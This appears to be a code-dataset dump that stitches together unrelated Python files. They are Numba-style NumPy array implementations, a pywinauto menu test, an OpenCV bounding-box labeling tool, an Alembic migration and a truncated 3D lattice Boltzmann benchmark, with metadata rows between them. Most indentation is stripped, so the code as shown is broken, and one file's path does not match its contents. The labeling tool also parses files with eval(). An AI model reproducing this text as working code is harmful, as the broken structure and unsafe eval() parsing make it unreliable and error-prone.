def numpy_ones_like_nd(context, builder, sig, args):
def ones_like(arr):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_ones_like_dtype_nd(context, builder, sig, args):
def ones_like(arr, dtype):
arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer))
def numpy_identity(context, builder, sig, args):
def identity(n):
arr = numpy.zeros((n, n))
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_identity_dtype(context, builder, sig, args):
def identity(n, dtype):
arr = numpy.zeros((n, n), dtype)
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n):
return numpy.identity(n)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer))
def numpy_eye_2(context, builder, sig, args):
def eye(n, m):
return numpy.eye(n, m, 0, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer))
def numpy_eye_3(context, builder, sig, args):
def eye(n, m, k):
return numpy.eye(n, m, k, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_eye_4(context, builder, sig, args):
def eye(n, m, k, dtype):
arr = numpy.zeros((n, m), dtype)
if k >= 0:
d = min(n, m - k)
for i in range(d):
arr[i, i + k] = 1
else:
d = min(n + k, m)
for i in range(d):
arr[i - k, i] = 1
return arr
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number))
def numpy_arange_1(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(stop):
return numpy.arange(0, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number))
def numpy_arange_2(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop):
return numpy.arange(start, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number))
def numpy_arange_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop, step):
return numpy.arange(start, stop, step, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number), types.Kind(types.DTypeSpec))
def numpy_arange_4(context, builder, sig, args):
if any(isinstance(a, types.Complex) for a in sig.args):
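        # Complex step: the length is the smaller of ceil(real) and
        # ceil(imag) of (stop - start) / step, clamped at zero so an empty
        # range allocates nothing.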
def arange(start, stop, step, dtype):
nitems_c = (stop - start) / step
nitems_r = math.ceil(nitems_c.real)
nitems_i = math.ceil(nitems_c.imag)
nitems = max(min(nitems_i, nitems_r), 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
else:
def arange(start, stop, step, dtype):
nitems_r = math.ceil((stop - start) / step)
nitems = max(nitems_r, 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
res = context.compile_internal(builder, arange, sig, args,
locals={'nitems': types.intp})
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number))
def numpy_linspace_2(context, builder, sig, args):
def linspace(start, stop):
return numpy.linspace(start, stop, 50)
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Integer))
def numpy_linspace_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def linspace(start, stop, num):
arr = numpy.empty(num, dtype)
div = num - 1
delta = stop - start
arr[0] = start
for i in range(1, num):
arr[i] = start + delta * (i / div)
return arr
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement("array.copy", types.Kind(types.Array))
def array_copy(context, builder, sig, args):
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape)
rettype = sig.return_type
ret = _empty_nd_impl(context, builder, rettype, shapes)
src_data = ary.data
dest_data = ret.data
assert rettype.layout == "C"
if arytype.layout == "C":
# Fast path: memcpy
# Compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
arrlen = builder.mul(arrlen, ary.itemsize)
pchar = lc.Type.int(8).as_pointer()
memcpy = builder.module.declare_intrinsic(
'llvm.memcpy', [pchar, pchar, arrlen.type])
builder.call(memcpy,
(builder.bitcast(dest_data, pchar),
builder.bitcast(src_data, pchar),
arrlen,
lc.Constant.int(lc.Type.int(32), 0),
lc.Constant.int(lc.Type.int(1), 0),
))
else:
src_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_strides = cgutils.unpack_tuple(builder, ret.strides)
intp_t = context.get_value_type(types.intp)
with cgutils.loop_nest(builder, shapes, intp_t) as indices:
src_ptr = cgutils.get_item_pointer2(builder, src_data,
shapes, src_strides,
arytype.layout, indices)
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
shapes, dest_strides,
rettype.layout, indices)
builder.store(builder.load(src_ptr), dest_ptr)
return impl_ret_new_ref(context, builder, sig.return_type, ret._getvalue())
@builtin
@implement(numpy.frombuffer, types.Kind(types.Buffer))
@implement(numpy.frombuffer, types.Kind(types.Buffer), types.Kind(types.DTypeSpec))
def np_frombuffer(context, builder, sig, args):
bufty = sig.args[0]
aryty = sig.return_type
buf = make_array(bufty)(context, builder, value=args[0])
out_ary_ty = make_array(aryty)
out_ary = out_ary_ty(context, builder)
out_datamodel = out_ary._datamodel
itemsize = get_itemsize(context, aryty)
ll_itemsize = lc.Constant.int(buf.itemsize.type, itemsize)
nbytes = builder.mul(buf.nitems, buf.itemsize)
# Check that the buffer size is compatible
rem = builder.srem(nbytes, ll_itemsize)
is_incompatible = cgutils.is_not_null(builder, rem)
with builder.if_then(is_incompatible, likely=False):
msg = "buffer size must be a multiple of element size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
shape = cgutils.pack_array(builder, [builder.sdiv(nbytes, ll_itemsize)])
strides = cgutils.pack_array(builder, [ll_itemsize])
data = builder.bitcast(buf.data,
context.get_value_type(out_datamodel.get_type('data')))
populate_array(out_ary,
data=data,
shape=shape,
strides=strides,
itemsize=ll_itemsize,
meminfo=buf.meminfo,
parent=buf.parent,)
res = out_ary._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
# -----------------------------------------------------------------------------
# Sorting
_sorting_init = False
def lt_floats(a, b):
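    # NaN-aware less-than for sorting: every ordinary value compares
    # smaller than NaN, so NaNs end up grouped at the end of the array.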
return math.isnan(b) or a < b
def load_sorts():
"""
    Load quicksort lazily, to avoid circular imports across the jit() global.
"""
g = globals()
if g['_sorting_init']:
return
default_quicksort = quicksort.make_jit_quicksort()
g['run_default_quicksort'] = default_quicksort.run_quicksort
float_quicksort = quicksort.make_jit_quicksort(lt=lt_floats)
g['run_float_quicksort'] = float_quicksort.run_quicksort
g['_sorting_init'] = True
@builtin
@implement("array.sort", types.Kind(types.Array))
def array_sort(context, builder, sig, args):
load_sorts()
arytype = sig.args[0]
dtype = arytype.dtype
if isinstance(dtype, types.Float):
def array_sort_impl(arr):
return run_float_quicksort(arr)
else:
def array_sort_impl(arr):
return run_default_quicksort(arr)
return context.compile_internal(builder, array_sort_impl, sig, args)
@builtin
@implement(numpy.sort, types.Kind(types.Array))
def np_sort(context, builder, sig, args):
def np_sort_impl(a):
res = a.copy()
res.sort()
return res
return context.compile_internal(builder, np_sort_impl, sig, args)
| bsd-2-clause | -1,622,536,346,280,335,400 | 34.741639 | 96 | 0.599943 | false |
cetygamer/pywinauto | pywinauto/unittests/test_menuwrapper.py | 1 | 6250 | # GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for Menu"""
import sys
import os
import unittest
sys.path.append(".")
from pywinauto.application import Application
from pywinauto.sysinfo import is_x64_Python
from pywinauto.controls.menuwrapper import MenuItemNotEnabled
from pywinauto.timings import Timings
mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
class MenuWrapperTests(unittest.TestCase):
"Unit tests for the Menu and the MenuItem classes"
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.Defaults()
self.app = Application()
self.app.start("Notepad.exe")
self.dlg = self.app.Notepad
def tearDown(self):
"Close the application after tests"
self.app.kill_()
def testInvalidHandle(self):
"Test that an exception is raised with an invalid menu handle"
# self.assertRaises(InvalidWindowHandle, HwndWrapper, -1)
pass
def testItemCount(self):
self.assertEqual(5, self.dlg.Menu().ItemCount())
def testItem(self):
self.assertEqual(u'&File', self.dlg.Menu().Item(0).Text())
self.assertEqual(u'&File', self.dlg.Menu().Item(u'File').Text())
self.assertEqual(u'&File', self.dlg.Menu().Item(u'&File', exact=True).Text())
def testItems(self):
self.assertEqual([u'&File', u'&Edit', u'F&ormat', u'&View', u'&Help'],
[item.Text() for item in self.dlg.Menu().Items()])
def testFriendlyClassName(self):
self.assertEqual('MenuItem', self.dlg.Menu().Item(0).friendly_class_name())
def testMenuItemNotEnabled(self):
self.assertRaises(MenuItemNotEnabled, self.dlg.MenuSelect, 'Edit->Find Next')
self.assertRaises(MenuItemNotEnabled, self.dlg.MenuItem('Edit->Find Next').Click)
self.assertRaises(MenuItemNotEnabled, self.dlg.MenuItem('Edit->Find Next').click_input)
def testGetProperties(self):
self.assertEqual(
{u'menu_items':
[{u'index': 0, u'state': 0, u'item_type': 0, u'item_id': 64, u'text': u'View &Help'},
{u'index': 1, u'state': 3, u'item_type': 2048, u'item_id': 0, u'text': u''},
{u'index': 2, u'state': 0, u'item_type': 0, u'item_id': 65, u'text': u'&About Notepad'}]},
self.dlg.Menu().GetMenuPath('Help')[0].SubMenu().GetProperties())
def testGetMenuPath(self):
# print('id = ' + str(self.dlg.Menu().GetMenuPath('Help->#3')[0].id()))
self.assertEqual(u'&About Notepad', self.dlg.Menu().GetMenuPath(' Help -> #2 ')[-1].Text())
self.assertEqual(u'&About Notepad', self.dlg.Menu().GetMenuPath('Help->$65')[-1].Text())
self.assertEqual(u'&About Notepad',
self.dlg.Menu().GetMenuPath('&Help->&About Notepad', exact=True)[-1].Text())
self.assertRaises(IndexError, self.dlg.Menu().GetMenuPath, '&Help->About what?', exact=True)
def test__repr__(self):
print(self.dlg.Menu())
print(self.dlg.Menu().GetMenuPath('&Help->&About Notepad', exact=True)[-1])
def testClick(self):
self.dlg.Menu().GetMenuPath('&Help->&About Notepad')[-1].Click()
About = self.app.Window_(title='About Notepad')
About.Wait('ready')
About.OK.Click()
About.WaitNot('visible')
def testClickInput(self):
self.dlg.Menu().GetMenuPath('&Help->&About Notepad')[-1].click_input()
About = self.app.Window_(title='About Notepad')
About.Wait('ready')
About.OK.Click()
About.WaitNot('visible')
class OwnerDrawnMenuTests(unittest.TestCase):
"""Unit tests for the OWNERDRAW menu items"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.Defaults()
self.app = Application().Start(os.path.join(mfc_samples_folder, u"BCDialogMenu.exe"))
self.dlg = self.app.BCDialogMenu
self.app.wait_cpu_usage_lower(threshold=1.5, timeout=30, usage_interval=1)
self.dlg.wait('ready')
def tearDown(self):
"""Close the application after tests"""
self.app.kill_()
def testCorrectText(self):
menu = self.dlg.Menu()
self.assertEqual(u'&New', menu.GetMenuPath('&File->#0')[-1].Text()[:4])
self.assertEqual(u'&Open...', menu.GetMenuPath('&File->#1')[-1].Text()[:8])
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -1,208,418,087,928,953,300 | 40.666667 | 107 | 0.66672 | false |
frombeijingwithlove/dlcv_for_beginners | chap6/bbox_labeling/bbox_labeling.py | 1 | 7575 | import os
import cv2
from tkFileDialog import askdirectory
from tkMessageBox import askyesno
WINDOW_NAME = 'Simple Bounding Box Labeling Tool'
FPS = 24
SUPPORTED_FORMATS = ['jpg', 'jpeg', 'png']
DEFAULT_COLOR = {'Object': (255, 0, 0)}
COLOR_GRAY = (192, 192, 192)
BAR_HEIGHT = 16
KEY_UP = 65362
KEY_DOWN = 65364
KEY_LEFT = 65361
KEY_RIGHT = 65363
KEY_ESC = 27
KEY_DELETE = 65535
KEY_EMPTY = 0
get_bbox_name = '{}.bbox'.format
class SimpleBBoxLabeling:
def __init__(self, data_dir, fps=FPS, window_name=None):
self._data_dir = data_dir
self.fps = fps
self.window_name = window_name if window_name else WINDOW_NAME
self._pt0 = None
self._pt1 = None
self._drawing = False
self._cur_label = None
self._bboxes = []
label_path = '{}.labels'.format(self._data_dir)
self.label_colors = DEFAULT_COLOR if not os.path.exists(label_path) else self.load_labels(label_path)
        imagefiles = [x for x in os.listdir(self._data_dir) if x[x.rfind('.') + 1:].lower() in SUPPORTED_FORMATS]
        labeled = [x for x in imagefiles if os.path.exists(os.sep.join([self._data_dir, get_bbox_name(x)]))]
to_be_labeled = [x for x in imagefiles if x not in labeled]
self._filelist = labeled + to_be_labeled
self._index = len(labeled)
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
def _mouse_ops(self, event, x, y, flags, param):
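        # Left-drag draws a box for the current label and releasing commits
        # it; moving updates the rubber band; right-click removes the last box.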
if event == cv2.EVENT_LBUTTONDOWN:
self._drawing = True
self._pt0 = (x, y)
elif event == cv2.EVENT_LBUTTONUP:
self._drawing = False
self._pt1 = (x, y)
self._bboxes.append((self._cur_label, (self._pt0, self._pt1)))
elif event == cv2.EVENT_MOUSEMOVE:
self._pt1 = (x, y)
elif event == cv2.EVENT_RBUTTONUP:
if self._bboxes:
self._bboxes.pop()
def _clean_bbox(self):
self._pt0 = None
self._pt1 = None
self._drawing = False
self._bboxes = []
def _draw_bbox(self, img):
h, w = img.shape[:2]
canvas = cv2.copyMakeBorder(img, 0, BAR_HEIGHT, 0, 0, cv2.BORDER_CONSTANT, value=COLOR_GRAY)
label_msg = '{}: {}, {}'.format(self._cur_label, self._pt0, self._pt1) \
if self._drawing \
else 'Current label: {}'.format(self._cur_label)
msg = '{}/{}: {} | {}'.format(self._index + 1, len(self._filelist), self._filelist[self._index], label_msg)
cv2.putText(canvas, msg, (1, h+12),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 0), 1)
for label, (bpt0, bpt1) in self._bboxes:
label_color = self.label_colors[label] if label in self.label_colors else COLOR_GRAY
cv2.rectangle(canvas, bpt0, bpt1, label_color, thickness=2)
cv2.putText(canvas, label, (bpt0[0]+3, bpt0[1]+15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
if self._drawing:
label_color = self.label_colors[self._cur_label] if self._cur_label in self.label_colors else COLOR_GRAY
if self._pt1[0] >= self._pt0[0] and self._pt1[1] >= self._pt0[1]:
cv2.rectangle(canvas, self._pt0, self._pt1, label_color, thickness=2)
cv2.putText(canvas, self._cur_label, (self._pt0[0] + 3, self._pt0[1] + 15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
return canvas
@staticmethod
def export_bbox(filepath, bboxes):
if bboxes:
with open(filepath, 'w') as f:
for bbox in bboxes:
line = repr(bbox) + '\n'
f.write(line)
elif os.path.exists(filepath):
os.remove(filepath)
@staticmethod
def load_bbox(filepath):
bboxes = []
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
bboxes.append(eval(line))
line = f.readline().rstrip()
return bboxes
@staticmethod
def load_labels(filepath):
label_colors = {}
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
label, color = eval(line)
label_colors[label] = color
line = f.readline().rstrip()
return label_colors
@staticmethod
def load_sample(filepath):
img = cv2.imread(filepath)
bbox_filepath = get_bbox_name(filepath)
bboxes = []
if os.path.exists(bbox_filepath):
bboxes = SimpleBBoxLabeling.load_bbox(bbox_filepath)
return img, bboxes
def _export_n_clean_bbox(self):
bbox_filepath = os.sep.join([self._data_dir, get_bbox_name(self._filelist[self._index])])
self.export_bbox(bbox_filepath, self._bboxes)
self._clean_bbox()
def _delete_current_sample(self):
filename = self._filelist[self._index]
filepath = os.sep.join([self._data_dir, filename])
if os.path.exists(filepath):
os.remove(filepath)
filepath = get_bbox_name(filepath)
if os.path.exists(filepath):
os.remove(filepath)
self._filelist.pop(self._index)
print('{} is deleted!'.format(filename))
def start(self):
last_filename = ''
label_index = 0
labels = self.label_colors.keys()
n_labels = len(labels)
cv2.namedWindow(self.window_name)
cv2.setMouseCallback(self.window_name, self._mouse_ops)
key = KEY_EMPTY
delay = int(1000 / FPS)
while key != KEY_ESC:
if key == KEY_UP:
if label_index == 0:
pass
else:
label_index -= 1
elif key == KEY_DOWN:
if label_index == n_labels - 1:
pass
else:
label_index += 1
elif key == KEY_LEFT:
if self._index > 0:
self._export_n_clean_bbox()
self._index -= 1
if self._index < 0:
self._index = 0
elif key == KEY_RIGHT:
if self._index < len(self._filelist) - 1:
self._export_n_clean_bbox()
self._index += 1
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
elif key == KEY_DELETE:
if askyesno('Delete Sample', 'Are you sure?'):
self._delete_current_sample()
key = KEY_EMPTY
continue
filename = self._filelist[self._index]
if filename != last_filename:
filepath = os.sep.join([self._data_dir, filename])
img, self._bboxes = self.load_sample(filepath)
self._cur_label = labels[label_index]
canvas = self._draw_bbox(img)
cv2.imshow(self.window_name, canvas)
key = cv2.waitKey(delay)
last_filename = filename
print('Finished!')
cv2.destroyAllWindows()
self.export_bbox(os.sep.join([self._data_dir, get_bbox_name(filename)]), self._bboxes)
print('Labels updated!')
if __name__ == '__main__':
dir_with_images = askdirectory(title='Where are the images?')
labeling_task = SimpleBBoxLabeling(dir_with_images)
labeling_task.start()
| bsd-3-clause | 2,674,751,870,218,334,700 | 32.223684 | 116 | 0.532937 | false |
teampopong/pokr.kr | alembic/versions/3e683fc1af11_region_id_field_of_meetings_table.py | 1 | 1559 | # -*- coding: utf-8 -*-
"""region_id field of 'meetings' table
Revision ID: 3e683fc1af11
Revises: 2f08fb65fe0b
Create Date: 2014-05-24 21:31:25.378918
"""
from __future__ import unicode_literals
# revision identifiers, used by Alembic.
revision = '3e683fc1af11'
down_revision = '2f08fb65fe0b'
from alembic import op
from sqlalchemy.sql import table, column
import sqlalchemy as sa
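# Lightweight table construct: lets the data migration below emit
# INSERT/DELETE statements without importing the application's models.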
region = table('region',
column('id', sa.String(16)),
column('name', sa.Unicode(20)),
column('name_en', sa.String(80)),
)
def upgrade():
op.alter_column('meeting', 'id', type_=sa.BigInteger, autoincrement=False)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.BigInteger)
op.alter_column('statement', 'meeting_id', type_=sa.BigInteger)
op.add_column('meeting', sa.Column('region_id', sa.String(length=16)))
op.create_index(op.f('ix_meeting_region_id'), 'meeting', ['region_id'], unique=False)
op.execute(
region.insert()\
.values({
'id': '0',
'name': '대한민국',
'name_en': 'national',
})
)
def downgrade():
op.alter_column('meeting', 'id', type_=sa.Integer, autoincrement=True)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.Integer)
op.alter_column('statement', 'meeting_id', type_=sa.Integer)
op.drop_index(op.f('ix_meeting_region_id'), table_name='meeting')
op.drop_column('meeting', 'region_id')
op.execute(
region.delete()\
.where(region.c.id == '0')
)
| apache-2.0 | -873,324,810,509,578,100 | 27.722222 | 89 | 0.620245 | false |
Ektorus/bohrium | ve/cpu/tools/locate.py | 1 | 8762 | from __future__ import print_function
## 3D Lattice Boltzmann (BGK) model of a fluid.
## D3Q19 model. At each timestep, particle densities propagate
## outwards in the directions indicated in the figure. An
## equivalent 'equilibrium' density is found, and the densities
## relax towards that state, in a proportion governed by omega.
## Iain Haslam, March 2006.
import util
if util.Benchmark().bohrium:
import bohrium as np
else:
import numpy as np
def main():
B = util.Benchmark()
nx = B.size[0]
ny = B.size[1]
nz = B.size[2]
ITER = B.size[3]
NO_OBST = 1
omega = 1.0
density = 1.0
deltaU = 1e-7
t1 = 1/3.0
t2 = 1/18.0
t3 = 1/36.0
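    # D3Q19 lattice weights: t1 for the rest particle, t2 for the 6 face
    # neighbours, t3 for the 12 edge neighbours.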
B.start()
F = np.ones((19, nx, ny, nz), dtype=np.float64)
F[:] = density/19.0
FEQ = np.ones((19, nx, ny, nz), dtype=np.float64)
FEQ[:] = density/19.0
T = np.zeros((19, nx, ny, nz), dtype=np.float64)
#Create the scenery.
BOUND = np.zeros((nx, ny, nz), dtype=np.float64)
BOUNDi = np.ones((nx, ny, nz), dtype=np.float64)
"""
if not NO_OBST:
for i in xrange(nx):
for j in xrange(ny):
for k in xrange(nz):
if ((i-4)**2+(j-5)**2+(k-6)**2) < 6:
BOUND[i,j,k] += 1.0
BOUNDi[i,j,k] += 0.0
BOUND[:,0,:] += 1.0
BOUNDi[:,0,:] *= 0.0
"""
if util.Benchmark().bohrium:
np.flush()
for ts in xrange(0, ITER):
##Propagate / Streaming step
T[:] = F
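        # Streaming with periodic boundaries: each direction shifts by one
        # cell, and densities leaving one face re-enter on the opposite one.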
#nearest-neighbours
F[1,:,:,0] = T[1,:,:,-1]
F[1,:,:,1:] = T[1,:,:,:-1]
F[2,:,:,:-1] = T[2,:,:,1:]
F[2,:,:,-1] = T[2,:,:,0]
F[3,:,0,:] = T[3,:,-1,:]
F[3,:,1:,:] = T[3,:,:-1,:]
F[4,:,:-1,:] = T[4,:,1:,:]
F[4,:,-1,:] = T[4,:,0,:]
F[5,0,:,:] = T[5,-1,:,:]
F[5,1:,:,:] = T[5,:-1,:,:]
F[6,:-1,:,:] = T[6,1:,:,:]
F[6,-1,:,:] = T[6,0,:,:]
#next-nearest neighbours
F[7,0 ,0 ,:] = T[7,-1 , -1,:]
F[7,0 ,1:,:] = T[7,-1 ,:-1,:]
F[7,1:,0 ,:] = T[7,:-1, -1,:]
F[7,1:,1:,:] = T[7,:-1,:-1,:]
F[8,0 ,:-1,:] = T[8,-1 ,1:,:]
F[8,0 , -1,:] = T[8,-1 ,0 ,:]
F[8,1:,:-1,:] = T[8,:-1,1:,:]
F[8,1:, -1,:] = T[8,:-1,0 ,:]
F[9,:-1,0 ,:] = T[9,1:, -1,:]
F[9,:-1,1:,:] = T[9,1:,:-1,:]
F[9,-1 ,0 ,:] = T[9,0 , 0,:]
F[9,-1 ,1:,:] = T[9,0 ,:-1,:]
F[10,:-1,:-1,:] = T[10,1:,1:,:]
F[10,:-1, -1,:] = T[10,1:,0 ,:]
F[10,-1 ,:-1,:] = T[10,0 ,1:,:]
F[10,-1 , -1,:] = T[10,0 ,0 ,:]
F[11,0 ,:,0 ] = T[11,0 ,:, -1]
F[11,0 ,:,1:] = T[11,0 ,:,:-1]
F[11,1:,:,0 ] = T[11,:-1,:, -1]
F[11,1:,:,1:] = T[11,:-1,:,:-1]
F[12,0 ,:,:-1] = T[12, -1,:,1:]
F[12,0 ,:, -1] = T[12, -1,:,0 ]
F[12,1:,:,:-1] = T[12,:-1,:,1:]
F[12,1:,:, -1] = T[12,:-1,:,0 ]
F[13,:-1,:,0 ] = T[13,1:,:, -1]
F[13,:-1,:,1:] = T[13,1:,:,:-1]
F[13, -1,:,0 ] = T[13,0 ,:, -1]
F[13, -1,:,1:] = T[13,0 ,:,:-1]
F[14,:-1,:,:-1] = T[14,1:,:,1:]
F[14,:-1,:, -1] = T[14,1:,:,0 ]
F[14,-1 ,:,:-1] = T[14,0 ,:,1:]
F[14,-1 ,:, -1] = T[14,0 ,:,0 ]
F[15,:,0 ,0 ] = T[15,:, -1, -1]
F[15,:,0 ,1:] = T[15,:, -1,:-1]
F[15,:,1:,0 ] = T[15,:,:-1, -1]
F[15,:,1:,1:] = T[15,:,:-1,:-1]
F[16,:,0 ,:-1] = T[16,:, -1,1:]
F[16,:,0 , -1] = T[16,:, -1,0 ]
F[16,:,1:,:-1] = T[16,:,:-1,1:]
F[16,:,1:, -1] = T[16,:,:-1,0 ]
F[17,:,:-1,0 ] = T[17,:,1:, -1]
F[17,:,:-1,1:] = T[17,:,1:,:-1]
F[17,:, -1,0 ] = T[17,:,0 , -1]
F[17,:, -1,1:] = T[17,:,0 ,:-1]
F[18,:,:-1,:-1] = T[18,:,1:,1:]
F[18,:,:-1, -1] = T[18,:,1:,0 ]
F[18,:,-1 ,:-1] = T[18,:,0 ,1:]
F[18,:,-1 , -1] = T[18,:,0 ,0 ]
#Densities bouncing back at next timestep
        BB = np.zeros(F.shape)  # zeroed: the bounce-back terms below accumulate with +=
T[:] = F
T[1:,:,:,:] *= BOUND[np.newaxis,:,:,:]
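        # The mask keeps only densities sitting on obstacle/boundary nodes;
        # each is then reflected into its opposite lattice direction
        # (1<->2, 3<->4, ...).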
BB[2 ,:,:,:] += T[1 ,:,:,:]
BB[1 ,:,:,:] += T[2 ,:,:,:]
BB[4 ,:,:,:] += T[3 ,:,:,:]
BB[3 ,:,:,:] += T[4 ,:,:,:]
BB[6 ,:,:,:] += T[5 ,:,:,:]
BB[5 ,:,:,:] += T[6 ,:,:,:]
BB[10,:,:,:] += T[7 ,:,:,:]
BB[9 ,:,:,:] += T[8 ,:,:,:]
BB[8 ,:,:,:] += T[9 ,:,:,:]
BB[7 ,:,:,:] += T[10,:,:,:]
BB[14,:,:,:] += T[11,:,:,:]
BB[13,:,:,:] += T[12,:,:,:]
BB[12,:,:,:] += T[13,:,:,:]
BB[11,:,:,:] += T[14,:,:,:]
BB[18,:,:,:] += T[15,:,:,:]
BB[17,:,:,:] += T[16,:,:,:]
BB[16,:,:,:] += T[17,:,:,:]
BB[15,:,:,:] += T[18,:,:,:]
        # Relaxation: compute the equilibrium distribution (FEQ) with the same velocity and density as F
DENSITY = np.add.reduce(F)
#UX = F[5,:,:,:].copy()
UX = np.ones(F[5,:,:,:].shape, dtype=np.float64)
UX[:,:,:] = F[5,:,:,:]
UX += F[7,:,:,:]
UX += F[8,:,:,:]
UX += F[11,:,:,:]
UX += F[12,:,:,:]
UX -= F[6,:,:,:]
UX -= F[9,:,:,:]
UX -= F[10,:,:,:]
UX -= F[13,:,:,:]
UX -= F[14,:,:,:]
UX /=DENSITY
#UY = F[3,:,:,:].copy()
UY = np.ones(F[3,:,:,:].shape, dtype=np.float64)
UY[:,:,:] = F[3,:,:,:]
UY += F[7,:,:,:]
UY += F[9,:,:,:]
UY += F[15,:,:,:]
UY += F[16,:,:,:]
UY -= F[4,:,:,:]
UY -= F[8,:,:,:]
UY -= F[10,:,:,:]
UY -= F[17,:,:,:]
UY -= F[18,:,:,:]
UY /=DENSITY
#UZ = F[1,:,:,:].copy()
UZ = np.ones(F[1,:,:,:].shape, dtype=np.float64)
